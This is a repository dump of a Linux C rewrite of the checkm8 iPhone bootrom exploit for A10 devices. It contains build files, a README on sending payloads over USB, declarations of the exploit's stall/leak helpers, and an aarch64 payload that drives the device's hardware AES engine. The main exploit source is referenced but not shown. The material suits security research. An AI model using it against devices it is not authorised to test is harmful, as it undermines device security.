/home/toor/ipwndfu_rewrite_c/checkm8_payloads 2 | 3 | # Set the install prefix 4 | if(NOT DEFINED CMAKE_INSTALL_PREFIX) 5 | set(CMAKE_INSTALL_PREFIX "/usr/local") 6 | endif() 7 | string(REGEX REPLACE "/$" "" CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}") 8 | 9 | # Set the install configuration name. 10 | if(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME) 11 | if(BUILD_TYPE) 12 | string(REGEX REPLACE "^[^A-Za-z0-9_]+" "" 13 | CMAKE_INSTALL_CONFIG_NAME "${BUILD_TYPE}") 14 | else() 15 | set(CMAKE_INSTALL_CONFIG_NAME "") 16 | endif() 17 | message(STATUS "Install configuration: \"${CMAKE_INSTALL_CONFIG_NAME}\"") 18 | endif() 19 | 20 | # Set the component getting installed. 21 | if(NOT CMAKE_INSTALL_COMPONENT) 22 | if(COMPONENT) 23 | message(STATUS "Install component: \"${COMPONENT}\"") 24 | set(CMAKE_INSTALL_COMPONENT "${COMPONENT}") 25 | else() 26 | set(CMAKE_INSTALL_COMPONENT) 27 | endif() 28 | endif() 29 | 30 | # Install shared libraries without execute permission? 31 | if(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE) 32 | set(CMAKE_INSTALL_SO_NO_EXE "1") 33 | endif() 34 | 35 | # Is this installation the result of a crosscompile? 36 | if(NOT DEFINED CMAKE_CROSSCOMPILING) 37 | set(CMAKE_CROSSCOMPILING "FALSE") 38 | endif() 39 | 40 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/DependInfo.cmake: -------------------------------------------------------------------------------- 1 | # The set of languages for which implicit dependencies are needed: 2 | set(CMAKE_DEPENDS_LANGUAGES 3 | "C" 4 | ) 5 | # The set of files for implicit dependencies of each language: 6 | set(CMAKE_DEPENDS_CHECK_C 7 | "/home/toor/ipwndfu_rewrite_c/checkm8_remote/main.c" "/home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o" 8 | "/home/toor/ipwndfu_rewrite_c/checkm8_remote/src/command.c" "/home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o" 9 | "/home/toor/ipwndfu_rewrite_c/checkm8_remote/src/exploit.c" "/home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o" 10 | "/home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.c" "/home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o" 11 | "/home/toor/ipwndfu_rewrite_c/checkm8_remote/src/payload.c" "/home/toor/ipwndfu_rewrite_c/checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o" 12 | ) 13 | set(CMAKE_C_COMPILER_ID "GNU") 14 | 15 | # The include file search paths: 16 | set(CMAKE_C_TARGET_INCLUDE_PATH 17 | "include" 18 | "checkm8_libusb/src" 19 | "checkm8_remote/include" 20 | ) 21 | 22 | # Targets to which this target links. 23 | set(CMAKE_TARGET_LINKED_INFO_FILES 24 | "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/DependInfo.cmake" 25 | ) 26 | 27 | # Fortran module output directory. 28 | set(CMAKE_Fortran_TARGET_MODULE_DIR "") 29 | -------------------------------------------------------------------------------- /checkm8_payloads/src/aes.c: -------------------------------------------------------------------------------- 1 | #include "brfunc_aes.h" 2 | #include "brfunc_timing.h" 3 | #include "brfunc_sep.h" 4 | 5 | #include "util.h" 6 | 7 | PAYLOAD_SECTION 8 | int aes_hw_crypto_command(unsigned int cmd, 9 | void *src, 10 | void *dst, 11 | int len, 12 | unsigned int opts, 13 | void *key, 14 | void *iv) 15 | { 16 | int seeded; 17 | long cgvar; 18 | long start = 0, timeout = 0; 19 | 20 | __asm__("orr %0, xzr, #0x3c" : "=r" (cgvar)); 21 | CLOCK_GATE(cgvar, 1); 22 | 23 | // seeded = DPA_SEEDED(); 24 | // if(!(seeded & 1)) 25 | // { 26 | // SEP_CREATE_SEND_DPA_MESSAGE(); 27 | // start = SYSTEM_TIME(); 28 | // 29 | // while(!(seeded & 1) && !(timeout & 1)) 30 | // { 31 | // seeded = DPA_SEEDED(); 32 | // timeout = TIME_HAS_ELAPSED(start, 1000); 33 | // } 34 | // } 35 | // 36 | // if(timeout) return -1; 37 | 38 | unsigned int key_command = CREATE_KEY_COMMAND(0, 0, 0, 0, 1, 0, 0, 0); 39 | *rAES_INT_STATUS = 0x20; 40 | *rAES_CONTROL = 1; 41 | 42 | PUSH_COMMAND_KEY(key_command, key); 43 | PUSH_COMMAND_IV(0, 0, 0, iv); 44 | PUSH_COMMAND_DATA(0, 0, src, dst, len); 45 | PUSH_COMMAND_FLAG(0, 1, 1); 46 | WAIT_FOR_COMMAND_FLAG(); 47 | 48 | *rAES_CONTROL = 2; 49 | CLOCK_GATE(cgvar, 0); 50 | return 0; 51 | } 52 | 53 | TEXT_SECTION 54 | int _start(void *src, 55 | void *dst, 56 | void *key) 57 | { 58 | return aes_hw_crypto_command(0, src, dst, 128, 0, key, 0); 59 | } -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/sink_parser.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #if !defined(_usb_h_) || defined(__SINK_PARSER_H__) 26 | #error "Never include hexdump.h directly; include Usb.h instead" 27 | #else 28 | #define __SINK_PARSER_H__ 29 | 30 | extern int UsbDEBUGlvl; 31 | 32 | // This parser does absolutely nothing with the data, just swallows it. 33 | 34 | template 35 | class SinkParser : public BASE_CLASS { 36 | public: 37 | 38 | SinkParser() { 39 | }; 40 | 41 | void Initialize() { 42 | }; 43 | 44 | void Parse(const LEN_TYPE len, const uint8_t *pbuf, const OFFSET_TYPE &offset) { 45 | }; 46 | }; 47 | 48 | 49 | #endif // __HEXDUMP_H__ 50 | -------------------------------------------------------------------------------- /checkm8_remote/include/libusb_helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H 2 | #define IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H 3 | 4 | #include "checkm8.h" 5 | 6 | #define LIBUSB_MAX_PACKET_SIZE 0x800 7 | 8 | struct libusb_device_bundle 9 | { 10 | struct libusb_context *ctx; 11 | struct libusb_device *device; 12 | struct libusb_device_handle *handle; 13 | struct libusb_device_descriptor *descriptor; 14 | }; 15 | 16 | int get_device_bundle(struct pwned_device *dev); 17 | int release_device_bundle(struct pwned_device *dev); 18 | int is_device_bundle_open(struct pwned_device *dev); 19 | 20 | int libusb1_async_ctrl_transfer(struct pwned_device *dev, 21 | unsigned char bmRequestType, unsigned char bRequest, 22 | unsigned short wValue, unsigned short wIndex, 23 | unsigned char *data, unsigned short data_len, 24 | unsigned int timeout); 25 | 26 | int libusb1_no_error_ctrl_transfer(struct pwned_device *dev, 27 | unsigned char bmRequestType, unsigned char bRequest, 28 | unsigned short wValue, unsigned short wIndex, 29 | unsigned char *data, unsigned short data_len, 30 | unsigned int timeout); 31 | 32 | int stall(struct pwned_device *dev); 33 | int leak(struct pwned_device *dev); 34 | int no_leak(struct pwned_device *dev); 35 | 36 | int usb_req_stall(struct pwned_device *dev); 37 | int usb_req_leak(struct pwned_device *dev); 38 | int usb_req_no_leak(struct pwned_device *dev); 39 | 40 | #endif //IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H 41 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | ~~~~~ checkm8_tool ~~~~~ 2 | 3 | This is the code for the optimized version of checkm8 that I wrote as a part of 4 | this project. It consists of a variety of modules and was built to run on 5 | Linux. It will probably not work on Windows or MacOS, although a port could 6 | definitely be possible in the future. 7 | 8 | checkm8_remote: the main executable generated by the project. It 9 | includes various functionality for communicating with 10 | and exploiting a device (currently, only iPhones with 11 | an A10 chip are supported), including payload transfer 12 | and execution. The main program is located in the 13 | checkm8_remote/main.c file. It is currently configured 14 | to install and run a basic AES payload. 15 | 16 | checkm8_libusb: a userspace library for communicating with USB devices. 17 | Currently this is unmodified from the standard release 18 | of libusb1.0, but in future versions there will be 19 | modifications to enable custom USB behavior. 20 | 21 | checkm8_payloads: the custom payload functionality is defined in this 22 | directory. To compile payloads, you need the 23 | aarch64-linux-gnu toolchain to cross-compile binaries 24 | for the iPhone platform. 25 | 26 | ~~~~~ Building ~~~~~ 27 | 28 | This project uses cmake as its build system. To build, simply do the following 29 | commands in the project's root directory 30 | 31 | mkdir build 32 | cd build 33 | cmake .. 34 | make 35 | 36 | ~~~~~ Usage ~~~~~~ 37 | 38 | To run the checkm8-remote binary, simply run 39 | 40 | ./build/checkm8_remote/checkm8_remote 41 | 42 | without any flags. Functionality is currently hardcoded to the AES payload, but 43 | will be made more configurable in the future. Make sure that the target device 44 | is in DFU mode before running the program. 45 | 46 | -------------------------------------------------------------------------------- /checkm8_remote/CMakeFiles/checkm8_remote.dir/depend.internal: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | checkm8_remote/CMakeFiles/checkm8_remote.dir/main.c.o 5 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/main.c 6 | checkm8_remote/include/checkm8.h 7 | checkm8_remote/include/command.h 8 | checkm8_remote/include/libusb_helpers.h 9 | checkm8_remote/include/payload.h 10 | include/checkm8_config.h 11 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/command.c.o 12 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/command.c 13 | checkm8_remote/include/checkm8.h 14 | checkm8_remote/include/command.h 15 | checkm8_remote/include/libusb_helpers.h 16 | include/checkm8_config.h 17 | include/libusb.h 18 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/exploit.c.o 19 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/exploit.c 20 | checkm8_remote/include/checkm8.h 21 | checkm8_remote/include/libusb_helpers.h 22 | include/checkm8_config.h 23 | include/libusb.h 24 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/libusb_helpers.c.o 25 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/libusb_helpers.c 26 | checkm8_libusb/src/libusbi.h 27 | checkm8_libusb/src/os/poll_posix.h 28 | checkm8_libusb/src/os/threads_posix.h 29 | checkm8_libusb/src/version.h 30 | checkm8_libusb/src/version_nano.h 31 | checkm8_remote/include/checkm8.h 32 | checkm8_remote/include/libusb_helpers.h 33 | include/checkm8_config.h 34 | include/libusb.h 35 | include/libusb_config.h 36 | checkm8_remote/CMakeFiles/checkm8_remote.dir/src/payload.c.o 37 | /home/toor/ipwndfu_rewrite_c/checkm8_remote/src/payload.c 38 | checkm8_remote/include/checkm8.h 39 | checkm8_remote/include/command.h 40 | checkm8_remote/include/libusb_helpers.h 41 | checkm8_remote/include/payload.h 42 | include/checkm8_config.h 43 | -------------------------------------------------------------------------------- /cmake_install.cmake: -------------------------------------------------------------------------------- 1 | # Install script for directory: /home/toor/ipwndfu_rewrite_c 2 | 3 | # Set the install prefix 4 | if(NOT DEFINED CMAKE_INSTALL_PREFIX) 5 | set(CMAKE_INSTALL_PREFIX "/usr/local") 6 | endif() 7 | string(REGEX REPLACE "/$" "" CMAKE_INSTALL_PREFIX "${CMAKE_INSTALL_PREFIX}") 8 | 9 | # Set the install configuration name. 10 | if(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME) 11 | if(BUILD_TYPE) 12 | string(REGEX REPLACE "^[^A-Za-z0-9_]+" "" 13 | CMAKE_INSTALL_CONFIG_NAME "${BUILD_TYPE}") 14 | else() 15 | set(CMAKE_INSTALL_CONFIG_NAME "") 16 | endif() 17 | message(STATUS "Install configuration: \"${CMAKE_INSTALL_CONFIG_NAME}\"") 18 | endif() 19 | 20 | # Set the component getting installed. 21 | if(NOT CMAKE_INSTALL_COMPONENT) 22 | if(COMPONENT) 23 | message(STATUS "Install component: \"${COMPONENT}\"") 24 | set(CMAKE_INSTALL_COMPONENT "${COMPONENT}") 25 | else() 26 | set(CMAKE_INSTALL_COMPONENT) 27 | endif() 28 | endif() 29 | 30 | # Install shared libraries without execute permission? 31 | if(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE) 32 | set(CMAKE_INSTALL_SO_NO_EXE "1") 33 | endif() 34 | 35 | # Is this installation the result of a crosscompile? 36 | if(NOT DEFINED CMAKE_CROSSCOMPILING) 37 | set(CMAKE_CROSSCOMPILING "FALSE") 38 | endif() 39 | 40 | if(NOT CMAKE_INSTALL_LOCAL_ONLY) 41 | # Include the install script for each subdirectory. 42 | include("/home/toor/ipwndfu_rewrite_c/checkm8_remote/cmake_install.cmake") 43 | include("/home/toor/ipwndfu_rewrite_c/checkm8_payloads/cmake_install.cmake") 44 | 45 | endif() 46 | 47 | if(CMAKE_INSTALL_COMPONENT) 48 | set(CMAKE_INSTALL_MANIFEST "install_manifest_${CMAKE_INSTALL_COMPONENT}.txt") 49 | else() 50 | set(CMAKE_INSTALL_MANIFEST "install_manifest.txt") 51 | endif() 52 | 53 | string(REPLACE ";" "\n" CMAKE_INSTALL_MANIFEST_CONTENT 54 | "${CMAKE_INSTALL_MANIFEST_FILES}") 55 | file(WRITE "/home/toor/ipwndfu_rewrite_c/${CMAKE_INSTALL_MANIFEST}" 56 | "${CMAKE_INSTALL_MANIFEST_CONTENT}") 57 | -------------------------------------------------------------------------------- /checkm8_libusb/src/libusb-1.0.rc: -------------------------------------------------------------------------------- 1 | /* 2 | * For Windows: input this file to the Resoure Compiler to produce a binary 3 | * .res file. This is then embedded in the resultant library (like any other 4 | * compilation object). 5 | * The information can then be queried using standard APIs and can also be 6 | * viewed with utilities such as Windows Explorer. 7 | */ 8 | #ifndef _WIN32_WCE 9 | #include "winresrc.h" 10 | #endif 11 | 12 | #include "version.h" 13 | #ifndef LIBUSB_VERSIONSTRING 14 | #define LU_STR(s) #s 15 | #define LU_XSTR(s) LU_STR(s) 16 | #if LIBUSB_NANO > 0 17 | #define LIBUSB_VERSIONSTRING \ 18 | LU_XSTR(LIBUSB_MAJOR) "." LU_XSTR(LIBUSB_MINOR) "." \ 19 | LU_XSTR(LIBUSB_MICRO) "." LU_XSTR(LIBUSB_NANO) LIBUSB_RC "\0" 20 | #else 21 | #define LIBUSB_VERSIONSTRING \ 22 | LU_XSTR(LIBUSB_MAJOR) "." LU_XSTR(LIBUSB_MINOR) "." \ 23 | LU_XSTR(LIBUSB_MICRO) LIBUSB_RC "\0" 24 | #endif 25 | #endif 26 | 27 | VS_VERSION_INFO VERSIONINFO 28 | FILEVERSION LIBUSB_MAJOR,LIBUSB_MINOR,LIBUSB_MICRO,LIBUSB_NANO 29 | PRODUCTVERSION LIBUSB_MAJOR,LIBUSB_MINOR,LIBUSB_MICRO,LIBUSB_NANO 30 | FILEFLAGSMASK 0x3fL 31 | #ifdef _DEBUG 32 | FILEFLAGS 0x1L 33 | #else 34 | FILEFLAGS 0x0L 35 | #endif 36 | FILEOS 0x40004L 37 | FILETYPE 0x2L 38 | FILESUBTYPE 0x0L 39 | BEGIN 40 | BLOCK "StringFileInfo" 41 | BEGIN 42 | BLOCK "040904b0" 43 | BEGIN 44 | VALUE "CompanyName", "src.info\0" 45 | VALUE "FileDescription", "C library for writing portable USB drivers in userspace\0" 46 | VALUE "FileVersion", LIBUSB_VERSIONSTRING 47 | VALUE "InternalName", "src\0" 48 | VALUE "LegalCopyright", "See individual source files, GNU LGPL v2.1 or later.\0" 49 | VALUE "LegalTrademarks", "http://www.gnu.org/licenses/lgpl-2.1.html\0" 50 | VALUE "OriginalFilename", "src-1.0.dll\0" 51 | VALUE "PrivateBuild", "\0" 52 | VALUE "ProductName", "src-1.0\0" 53 | VALUE "ProductVersion", LIBUSB_VERSIONSTRING 54 | VALUE "SpecialBuild", "\0" 55 | END 56 | END 57 | BLOCK "VarFileInfo" 58 | BEGIN 59 | VALUE "Translation", 0x409, 1200 60 | END 61 | END 62 | -------------------------------------------------------------------------------- /checkm8_arduino/include/Usb.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | /* USB functions */ 25 | #ifndef _usb_h_ 26 | #define _usb_h_ 27 | 28 | // WARNING: Do not change the order of includes, or stuff will break! 29 | #include "/opt/arduino-1.8.10/hardware/tools/avr/avr/include/inttypes.h" 30 | #include "/opt/arduino-1.8.10/hardware/tools/avr/lib/gcc/avr/7.3.0/include/stddef.h" 31 | #include "/opt/arduino-1.8.10/hardware/tools/avr/avr/include/stdio.h" 32 | 33 | // None of these should ever be included by a driver, or a user's sketch. 34 | #include "../lib/hostshield/settings.h" 35 | #include "../lib/hostshield/printhex.h" 36 | #include "../lib/hostshield/message.h" 37 | #include "../lib/hostshield/hexdump.h" 38 | #include "../lib/hostshield/sink_parser.h" 39 | #include "../lib/hostshield/max3421e.h" 40 | #include "../lib/hostshield/address.h" 41 | #include "../lib/hostshield/avrpins.h" 42 | #include "../lib/hostshield/usb_ch9.h" 43 | #include "../lib/hostshield/usbhost.h" 44 | #include "../lib/hostshield/UsbCore.h" 45 | #include "../lib/hostshield/parsetools.h" 46 | #include "../lib/hostshield/confdescparser.h" 47 | 48 | #endif //_usb_h_ 49 | -------------------------------------------------------------------------------- /tools/chroot-pi.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This script allows you to chroot ("work on") 4 | # the raspbian sd card as if it's the raspberry pi 5 | # on your Ubuntu desktop/laptop 6 | # just much faster and more convenient 7 | 8 | # credits: https://gist.github.com/jkullick/9b02c2061fbdf4a6c4e8a78f1312a689 9 | 10 | # make sure you have issued 11 | # (sudo) apt install qemu qemu-user-static binfmt-support 12 | 13 | # Write the raspbian image onto the sd card, 14 | # boot the pi with the card once 15 | # so it expands the fs automatically 16 | # then plug back to your laptop/desktop 17 | # and chroot to it with this script. 18 | 19 | # Invoke: 20 | # (sudo) ./chroot-to-pi.sh /dev/sdb 21 | # assuming /dev/sdb is your sd-card 22 | # if you don't know, when you plug the card in, type: 23 | # dmesg | tail -n30 24 | 25 | 26 | # Note: If you have an image file instead of the sd card, 27 | # you will need to issue 28 | # (sudo) apt install kpartx 29 | # (sudo) kpartx -v -a 2017-11-29-raspbian-stretch-lite.img 30 | # then 31 | # (sudo) ./chroot-to-pi.sh /dev/mapper/loop0p 32 | # With the vanilla image, you have very little space to work on 33 | # I have not figured out a reliable way to resize it 34 | # Something like this should work, but it didn't in my experience 35 | # https://gist.github.com/htruong/0271d84ae81ee1d301293d126a5ad716 36 | # so it's better just to let the pi resize the partitions 37 | 38 | mkdir -p /mnt/raspbian 39 | 40 | # mount partition 41 | mount -o rw ${1}2 /mnt/raspbian 42 | mount -o rw ${1}1 /mnt/raspbian/boot 43 | 44 | # mount binds 45 | mount --bind /dev /mnt/raspbian/dev/ 46 | mount --bind /sys /mnt/raspbian/sys/ 47 | mount --bind /proc /mnt/raspbian/proc/ 48 | mount --bind /dev/pts /mnt/raspbian/dev/pts 49 | 50 | # ld.so.preload fix 51 | sed -i 's/^/#CHROOT /g' /mnt/raspbian/etc/ld.so.preload 52 | 53 | # copy qemu binary 54 | cp /usr/bin/qemu-arm-static /mnt/raspbian/usr/bin/ 55 | 56 | echo "You will be transferred to the bash shell now." 57 | echo "Issue 'exit' when you are done." 58 | echo "Issue 'su pi' if you need to work as the user pi." 59 | 60 | # chroot to raspbian 61 | chroot /mnt/raspbian /bin/bash 62 | 63 | # ---------------------------- 64 | # Clean up 65 | # revert ld.so.preload fix 66 | sed -i 's/^#CHROOT //g' /mnt/raspbian/etc/ld.so.preload 67 | 68 | # unmount everything 69 | umount /mnt/raspbian/{dev/pts,dev,sys,proc,boot,} 70 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/DependInfo.cmake: -------------------------------------------------------------------------------- 1 | # The set of languages for which implicit dependencies are needed: 2 | set(CMAKE_DEPENDS_LANGUAGES 3 | "C" 4 | ) 5 | # The set of files for implicit dependencies of each language: 6 | set(CMAKE_DEPENDS_CHECK_C 7 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/core.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/core.c.o" 8 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/descriptor.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/descriptor.c.o" 9 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/hotplug.c.o" 10 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/io.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/io.c.o" 11 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_netlink.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_netlink.c.o" 12 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_udev.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_udev.c.o" 13 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/linux_usbfs.c.o" 14 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/poll_posix.c.o" 15 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/os/threads_posix.c.o" 16 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/strerror.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/strerror.c.o" 17 | "/home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/sync.c" "/home/toor/ipwndfu_rewrite_c/CMakeFiles/checkm8_libusb.dir/checkm8_libusb/src/sync.c.o" 18 | ) 19 | set(CMAKE_C_COMPILER_ID "GNU") 20 | 21 | # The include file search paths: 22 | set(CMAKE_C_TARGET_INCLUDE_PATH 23 | "include" 24 | "checkm8_libusb/src" 25 | ) 26 | 27 | # Targets to which this target links. 28 | set(CMAKE_TARGET_LINKED_INFO_FILES 29 | ) 30 | 31 | # Fortran module output directory. 32 | set(CMAKE_Fortran_TARGET_MODULE_DIR "") 33 | -------------------------------------------------------------------------------- /CMakeFiles/3.10.2/CMakeCCompiler.cmake: -------------------------------------------------------------------------------- 1 | set(CMAKE_C_COMPILER "/usr/bin/cc") 2 | set(CMAKE_C_COMPILER_ARG1 "") 3 | set(CMAKE_C_COMPILER_ID "GNU") 4 | set(CMAKE_C_COMPILER_VERSION "7.4.0") 5 | set(CMAKE_C_COMPILER_VERSION_INTERNAL "") 6 | set(CMAKE_C_COMPILER_WRAPPER "") 7 | set(CMAKE_C_STANDARD_COMPUTED_DEFAULT "11") 8 | set(CMAKE_C_COMPILE_FEATURES "c_std_90;c_function_prototypes;c_std_99;c_restrict;c_variadic_macros;c_std_11;c_static_assert") 9 | set(CMAKE_C90_COMPILE_FEATURES "c_std_90;c_function_prototypes") 10 | set(CMAKE_C99_COMPILE_FEATURES "c_std_99;c_restrict;c_variadic_macros") 11 | set(CMAKE_C11_COMPILE_FEATURES "c_std_11;c_static_assert") 12 | 13 | set(CMAKE_C_PLATFORM_ID "Linux") 14 | set(CMAKE_C_SIMULATE_ID "") 15 | set(CMAKE_C_SIMULATE_VERSION "") 16 | 17 | 18 | 19 | set(CMAKE_AR "/usr/bin/ar") 20 | set(CMAKE_C_COMPILER_AR "/usr/bin/gcc-ar-7") 21 | set(CMAKE_RANLIB "/usr/bin/ranlib") 22 | set(CMAKE_C_COMPILER_RANLIB "/usr/bin/gcc-ranlib-7") 23 | set(CMAKE_LINKER "/usr/bin/ld") 24 | set(CMAKE_COMPILER_IS_GNUCC 1) 25 | set(CMAKE_C_COMPILER_LOADED 1) 26 | set(CMAKE_C_COMPILER_WORKS TRUE) 27 | set(CMAKE_C_ABI_COMPILED TRUE) 28 | set(CMAKE_COMPILER_IS_MINGW ) 29 | set(CMAKE_COMPILER_IS_CYGWIN ) 30 | if(CMAKE_COMPILER_IS_CYGWIN) 31 | set(CYGWIN 1) 32 | set(UNIX 1) 33 | endif() 34 | 35 | set(CMAKE_C_COMPILER_ENV_VAR "CC") 36 | 37 | if(CMAKE_COMPILER_IS_MINGW) 38 | set(MINGW 1) 39 | endif() 40 | set(CMAKE_C_COMPILER_ID_RUN 1) 41 | set(CMAKE_C_SOURCE_FILE_EXTENSIONS c;m) 42 | set(CMAKE_C_IGNORE_EXTENSIONS h;H;o;O;obj;OBJ;def;DEF;rc;RC) 43 | set(CMAKE_C_LINKER_PREFERENCE 10) 44 | 45 | # Save compiler ABI information. 46 | set(CMAKE_C_SIZEOF_DATA_PTR "8") 47 | set(CMAKE_C_COMPILER_ABI "ELF") 48 | set(CMAKE_C_LIBRARY_ARCHITECTURE "x86_64-linux-gnu") 49 | 50 | if(CMAKE_C_SIZEOF_DATA_PTR) 51 | set(CMAKE_SIZEOF_VOID_P "${CMAKE_C_SIZEOF_DATA_PTR}") 52 | endif() 53 | 54 | if(CMAKE_C_COMPILER_ABI) 55 | set(CMAKE_INTERNAL_PLATFORM_ABI "${CMAKE_C_COMPILER_ABI}") 56 | endif() 57 | 58 | if(CMAKE_C_LIBRARY_ARCHITECTURE) 59 | set(CMAKE_LIBRARY_ARCHITECTURE "x86_64-linux-gnu") 60 | endif() 61 | 62 | set(CMAKE_C_CL_SHOWINCLUDES_PREFIX "") 63 | if(CMAKE_C_CL_SHOWINCLUDES_PREFIX) 64 | set(CMAKE_CL_SHOWINCLUDES_PREFIX "${CMAKE_C_CL_SHOWINCLUDES_PREFIX}") 65 | endif() 66 | 67 | 68 | 69 | 70 | 71 | set(CMAKE_C_IMPLICIT_LINK_LIBRARIES "gcc;gcc_s;c;gcc;gcc_s") 72 | set(CMAKE_C_IMPLICIT_LINK_DIRECTORIES "/usr/lib/gcc/x86_64-linux-gnu/7;/usr/lib/x86_64-linux-gnu;/usr/lib;/lib/x86_64-linux-gnu;/lib") 73 | set(CMAKE_C_IMPLICIT_LINK_FRAMEWORK_DIRECTORIES "") 74 | -------------------------------------------------------------------------------- /checkm8_libusb/src/os/threads_posix.c: -------------------------------------------------------------------------------- 1 | /* 2 | * src synchronization using POSIX Threads 3 | * 4 | * Copyright © 2011 Vitali Lovich 5 | * Copyright © 2011 Peter Stuge 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #include "libusb_config.h" 23 | 24 | #include 25 | #if defined(__linux__) || defined(__OpenBSD__) 26 | # if defined(__OpenBSD__) 27 | # define _BSD_SOURCE 28 | # endif 29 | # include 30 | # include 31 | #elif defined(__APPLE__) 32 | # include 33 | #elif defined(__CYGWIN__) 34 | # include 35 | #endif 36 | 37 | #include "threads_posix.h" 38 | #include "../libusbi.h" 39 | 40 | int usbi_cond_timedwait(pthread_cond_t *cond, 41 | pthread_mutex_t *mutex, const struct timeval *tv) 42 | { 43 | struct timespec timeout; 44 | int r; 